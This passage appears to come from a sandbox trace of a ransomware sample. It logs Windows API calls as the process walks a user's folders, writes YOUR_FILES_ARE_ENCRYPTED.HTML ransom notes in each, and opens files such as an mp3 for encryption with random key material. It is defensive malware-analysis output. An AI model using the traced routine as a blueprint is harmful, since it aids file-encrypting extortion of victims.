(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.640] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.640] CloseHandle (hObject=0x598) returned 1 [0167.640] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0167.640] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 70 [0167.640] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.640] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0167.640] lstrlenW (lpString=".url") returned 4 [0167.640] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0167.640] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.643] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.643] CloseHandle (hObject=0x598) returned 1 [0167.643] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0167.643] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.643] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0167.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.644] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.646] CloseHandle (hObject=0x5ac) returned 1 [0167.646] GetProcessHeap () returned 0x270000 [0167.647] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.647] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0167.647] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.647] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.647] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.649] CloseHandle (hObject=0x5a0) returned 1 [0167.649] GetProcessHeap () returned 0x270000 [0167.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.650] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links") returned 29 [0167.650] GetProcessHeap () returned 0x270000 [0167.650] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.650] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Links" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Links" [0167.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*" [0167.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad56beb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\desktop.ini") returned 41 [0167.650] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.650] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.650] lstrlenW (lpString=".ini") returned 4 [0167.650] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.650] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0167.650] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\Desktop.lnk") returned 41 [0167.651] lstrcmpW (lpString1="Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x35b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\Downloads.lnk") returned 43 [0167.651] lstrcmpW (lpString1="Downloads.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad56beb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad592010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x5fc, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\OneDrive.lnk") returned 42 [0167.651] lstrcmpW (lpString1="OneDrive.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\RecentPlaces.lnk") returned 46 [0167.651] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0167.651] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0167.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.652] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.654] CloseHandle (hObject=0x5a0) returned 1 [0167.654] GetProcessHeap () returned 0x270000 [0167.654] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.655] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0167.655] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings") returned 38 [0167.655] GetProcessHeap () returned 0x270000 [0167.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.655] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings" [0167.655] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*" [0167.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0167.655] GetProcessHeap () returned 0x270000 [0167.656] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.656] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Music", cAlternateFileName="")) returned 1 [0167.656] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music") returned 29 [0167.656] GetProcessHeap () returned 0x270000 [0167.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.656] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music" [0167.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*" [0167.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.656] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.656] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="4KhlAV sb2I", cAlternateFileName="4KHLAV~1")) returned 1 [0167.656] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I") returned 41 [0167.656] GetProcessHeap () returned 0x270000 [0167.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.656] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I" [0167.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*" [0167.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.657] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.657] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d4e7b0, ftCreationTime.dwHighDateTime=0x1d7e777, ftLastAccessTime.dwLowDateTime=0x77aa1940, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0x77aa1940, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xdf37, dwReserved0=0x0, dwReserved1=0x60, cFileName="5JHGboRpMB Q.mp3", cAlternateFileName="5JHGBO~1.MP3")) returned 1 [0167.657] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3") returned 58 [0167.657] lstrcmpW (lpString1="5JHGboRpMB Q.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.657] PathFindExtensionW (pszPath="5JHGboRpMB Q.mp3") returned=".mp3" [0167.657] lstrlenW (lpString=".mp3") returned 4 [0167.657] PathFindExtensionW (pszPath="5JHGboRpMB Q.mp3") returned=".mp3" [0167.657] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\5jhgborpmb q.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.657] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=57143) returned 1 [0167.657] GetProcessHeap () returned 0x270000 [0167.657] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.660] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="46") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="25") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="38") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="2C") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4E") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="4A") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E2") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="86") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="0C") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="38") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0F") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="D2") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0C") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="27") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="08") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="67") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="70") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C4") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B6") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda8e, 